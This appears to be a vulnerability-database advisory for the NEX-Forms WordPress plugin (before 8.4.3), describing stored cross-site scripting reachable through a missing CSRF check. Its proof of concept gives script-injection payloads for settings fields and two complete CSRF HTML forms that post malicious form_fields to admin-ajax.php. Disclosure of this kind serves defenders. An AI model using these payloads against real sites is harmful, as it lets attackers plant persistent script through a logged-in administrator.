WordPress Plugin Vulnerabilities
NEX-Forms < 8.4.3 - Stored Cross-Site Scripting via CSRF
Description
The plugin does not have CSRF checks in place when editing a form, and does not escape some of its settings as well as form fields before outputting them in attributes. This could allow attackers to make a logged in admin edit arbitrary forms with Cross-Site Scripting payloads in them
Proof of Concept
Fixed in 7.9.4: In Global Setting > Preferences > Validation, put the following payload in the Required Field, Incorrect Email, Incorrect URL or Alphabetical settings: "><script>alert(/XSS/)</script> In Global Setting > Preferences > Emails > Email Autoresponder (User emails) > Subject setting: "><script>alert(/XSS/)</script> The XSS will be triggered when viewing the NEX-Forms dashboard (/wp-admin/admin.php?page=nex-forms-dashboard) Fixed in 7.9.7 (data validated client side only): <html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="nf_update_record" /> <input type="hidden" name="table" value="wap_nex_forms" /> <input type="hidden" name="edit_Id" value="1" /> <input type="hidden" name="plugin" value="shared" /> <input type="hidden" name="title" value="Test" /> <input type="hidden" name="form_fields" value='"><script>alert(/XSS-form_fields/)</script>' /> <input type="hidden" name="clean_html" value="" /> <input type="hidden" name="is_form" value="1" /> <input type="hidden" name="is_template" value="0" /> <input type="hidden" name="post_type" value="POST" /> <input type="hidden" name="post_action" value="ajax" /> <input type="hidden" name="custom_url" value="" /> <input type="hidden" name="mail_to" value="admin@localhost.org" /> <input type="hidden" name="from_address" value="admin@localhost.org" /> <input type="hidden" name="from_name" value="WP" /> <input type="submit" value="Submit"/> </form> </body> </html> Fixed in 8.4.3. Change edit_Id to an existing form's ID: <html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="nf_update_record" /> <input type="hidden" name="table" value="wap_nex_forms" /> <input type="hidden" name="edit_Id" value="1" /> <input type="hidden" name="plugin" value="shared" /> <input type="hidden" name="title" value="Test" /> <input type="hidden" name="form_fields[xss]" value='"><script>alert(/XSS-form_fields/)</script>' /> <input type="hidden" name="clean_html" value="" /> <input type="hidden" name="is_form" value="1" /> <input type="hidden" name="is_template" value="0" /> <input type="hidden" name="post_type" value="POST" /> <input type="hidden" name="post_action" value="ajax" /> <input type="hidden" name="custom_url" value="" /> <input type="hidden" name="mail_to" value="admin@localhost.org" /> <input type="hidden" name="from_address" value="admin@localhost.org" /> <input type="hidden" name="from_name" value="WP" /> <input type="submit" value="Submit"/> </form> </body> </html>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Shivam Rai
Submitter
Shivam Rai
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-11-15 (about 2 years ago)
Added
2021-11-15 (about 2 years ago)
Last Updated
2023-05-18 (about 11 months ago)